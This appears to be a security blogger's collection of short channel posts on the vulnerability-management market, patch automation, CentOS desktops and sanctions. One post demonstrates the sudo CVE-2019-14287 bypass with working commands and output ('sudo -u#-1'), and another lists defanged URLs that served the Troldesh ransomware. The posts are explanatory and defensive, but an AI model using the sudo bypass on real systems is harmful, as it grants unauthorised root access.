The news that Rostelecom (Solar) will begin to provide Qualys Vulnerability Management services (rus) probably doesn't mean much on a global scale, but it's quite interesting for Russian market and for markets of other "countries with strict data sovereignty rules".

What problems we have with global cloud-based security solutions, including Vulnerability Management solutions? When the data about vulnerabilities of Russian organizations is stored and processed somewhere abroad and it is not clear how and by whom, (even if we are not even talking about the real threats) it's is a red flag for government regulators, like FSTEC. And they can easily make the usage of such services VERY complicated, at least among the customers that are somehow related to the government. The same restrictions stimulate the development of local security products, that's why we have local players on Russian #VulnerabilityManagement market, like Positive Technologies, Altx-Soft, NPO Echelon, etc.

BUT when a foreign security vendor delivers its solution in a form of Private Cloud through the largest Russian service provider, which also has Russian state as the main shareholder, it's is a different story. Data will be stored and processed in Russia, US vendor only updates the cloud platform, so what's the problem? If it will be needed, Rostelecom has enough resources to get all necessary certificates for this cloud service, and may re-label it as their own.

Currently it is not clear how much the offer from #Rostelecom will differ from the standard #Qualys services. Details of the deal are not publicly known. Will Rostelecom pay Qualys a fix, and Rostelecom will then try to monetize it? Will Qualys and Rostelecom share money from the actual customers somehow? Will Qualys pay Rostelecom for hosting, and the money from customers will go directly to Qualys? It's unclear now. Most likely 1 or 2, but they could agree on a very different terms. 🙂

But in any case, the domestic Russian Vulnerability Management market might be shaken. And I think it's great. At least for the end-users. 🙂 And when Tenable will someday release their own Private Cloud with Tenable.io, it will be even better. 😉

H.R.2810 - National Defense Authorization Act for Fiscal Year 2018. IMHO, it's a great lesson for any foreign cybersecurity vendor who wants to work in a free and completely competitive US market. 😏 No matter how many Transparency Centers you open and how global you are, it will be possible to label you as 'Evil Russians' (or Chinese, Iranians, Koreans, whatever) and ban without any real evidence. IMHO, this is nothing more than lobbying and protectionism. #kaspersky

I decided to publish my simple console Password Manager. I called it barapass (github). I've been using It for quite some time in Linux and in Windows (in WSL). Probably it will also work natively in Windows and MacOS with minimal fixes, but I haven’t tried it yet.

I've also described in my blog:

* Why do people use password managers?
* How to use barapass? (installation, encrypting and decrypting files, earching in encrypted file)
* Is it safe to copy passwords to clipboard?

Read here: https://avleonov.com/2019/09/17/barapass-console-password-manager/

#barapass #concept #AES #CLI #crypto #Linux #password #python #python3 #WSL #xclip

Also, an example of #barapass CLI

Hi guys! You are not my personal army, but can I ask you to vote for me ("Александр Леонов aka Беспощадный Эксперт") below? 🙂

One of the best satirical telegram channels about Russian Information Security community organizes "voting battles" between security bloggers, speakers and well-known company leaders. For some reason they put me there as well. 😅 Unlike most "participants", who just ignore all this mess, I find this a fun and completely free way to promote what I do. So, please vote for me and ask your friends to vote as well! 🗳✌️

And if you speak Russian, subscribe to @rusecmedia, some of their jokes are just hilarious.

Долго не могли пригласить Александра, говорит, что был в блоггерской командировке по Фейсбуку.

It’s not so obvious that socks servers with authentication are a necessary thing:

1. You can run a “local socks service” simply by connecting to a remote host via ssh (with -D <port>)
2. Most of software products, that support socks, don’t support socks servers with authentication

The last fact I find very unfortunate, because using socks without having to monitor ssh connection is much more comfortable. But if the software actually supports socks with authentication you can try Dante server.

Here’s how to install and configure it in CentOS 7: https://avleonov.com/2019/09/23/dante-socks5-server-with-authentication

#CentOS #Dante #SOCKS #SOCKS5

Pretty nice GUI feature in the latest #Nessus Professional 8.7.0. Now you can select a host or hosts in the scan results and create a new scan based on a different Scan Template/Policy. For example, you can perform a fast discovery scan, filter some hosts and then scan them deeply with authentication. Other features of this release are about Nessus Manager and Essentials, so not very interesting for me. 🙂 #Tenable

Features in the GUI are certainly pleasant, but the real game changer in Vulnerability Management, IMHO, will be automated patching for a reasonable price. It is much better when you do not just say that some systems are vulnerable but fix these problems with one click. At least most of them.

So, it's great that some VM vendors work on this. For example, 2 weeks ago #Qualys released a new 1.3 version of Patch Management module. It seems from the changes list that they understand: Windows patching is not only about the actual installation of the patches. It is also about:

- Catching the right time for patching. Now in Qualys you can choose "None" for Patch Window and install the emergency patch as soon as possible; patches can be also pre-downloaded before the job start to save some time.
- Changes in the registry and other reconfigurations.
- Reboots. Now in Qualys you can suppress reboot notification and reboot the host immediately after the patch deployment.

These are steps in the right direction.

The main thing that upsets me in #CentOS8 (that was finally released 4 days ago) is the lack of alternative desktop environments in repositories, even in EPEL. There is only a sloooow Gnome 3 with terrible junk animations that I REALLY hate. 😢

And now I am thinking what is better: to put up with Gnome (at least for a while) and patiently wait for my favourite #XFCE in EPEL (there is a request for this), to install XFCE from the source (it seems difficult) or try to install some other minimalistic DE from source... 🤔

I doubt that there are many people who use #CentOS as a Desktop OS, but if there are any, I would be happy to hear your opinion at https://t.iss.one/avleonovchat.

I just saw a nice post by #JSOC (in Russian) about the new version of #Troldesh cryptolocker cyberattack. This time attackers use legitimate but compromised #WordPress websites in phishing.

The links look pretty normal:

Horsesmouth[.]org/wp-content/themes/InspiredBits/images/dummy/doc/doc/

www.montessori-academy[.]org/wp-content/themes/campus/mythology-core/core-assets/images/social-icons/long-shadow/doc/

chestnutplacejp[.]com/wp-content/ai1wm-backups/doc/

Since these sites are legit and have a good reputation, it's quite difficult to detect and block emails with such links.

This is another good reason to update the vulnerable CMS as soon as possible, since the malware distribution can be even more dangerous for your business than the compromisation of the site itself.

#cryptolocker #phishing

Continuing the topic about the Qualys PM feature, I REALLY want to see the universal fully automated #PatchManagement (and therefore #VulnerabilityManagement), but I DON'T think we are close to that.

1. It is difficult to formalize all the steps that are necessary for patching. There are thousands of third-party software products (especially for Windows desktops). Even to get information about all the vulnerabilities in all these products is hard, getting the actionable and formal remediation instructions for them is even harder, and it's almost impossible to follow these instructions automatically and in a reliable way.

2. Patches sometimes break systems. It just happens. In a common human-driven process, there will always be a responsible person, who has not performed all necessary tests before actual patching and has not discussed the possible consequences with the system owner. In a fully automated process, you only have a PM product and the vendor who does not guarantee anything.

Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:

1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.

It seems a bit foolish to offer automated remediation for the systems where almost everything can be updated with a single command from #WSUS or Linux repository. However, in the case of Linux, there will be software installed from sources, self-built packages, and other complexities. And it's even without talking about #Docker. 🤯

So, it turns out that the most convenient for vendors is to focus on Windows desktops. And not for the all programs, but only for a specific list (clarify this to avoid surprises!).

Plus, the trigger and responsibility are still in the hands of IT administrators. 😉

Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.

Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people, who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy"-fighters? 😏

The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. 😕 At least, it is much better than to face such unfriendly unilateral actions unprepared and not to have any alternatives.

It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).

Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.

My reasons were as follows:

1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of Linux world. The only way to achieve this is to use such distribution every day.
3. I was tired of problems with the Virtual Box guest additions in #CentOS 7 (yes , I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it’s slow and ugly (however it’s fully functional!). And there were no other DEs in CentOS 8 repositories at that time.

Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/

A nice, but not very practical bug in #sudo CVE-2019-14287. Let's say I created a temp user:
# useradd temp
# passwd temp

And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id

Then I login as a temp user:
# su temp

I can run /usr/bin/id as temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)

I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.

BUT if I set a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's a bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)

^- we see that it was really executed as root with uid 0.

Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. This bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha! 😀

What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?

There are two main issues that each Vulnerability Scanning vendor faces:

1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside the big organization, where people can make integrations with various IT data source, it's not not so obvious what to scan! Of course, you can get some targets using known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important or/and add unrelated trash. Thus, there will be many false positives and false negatives in your report.

2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.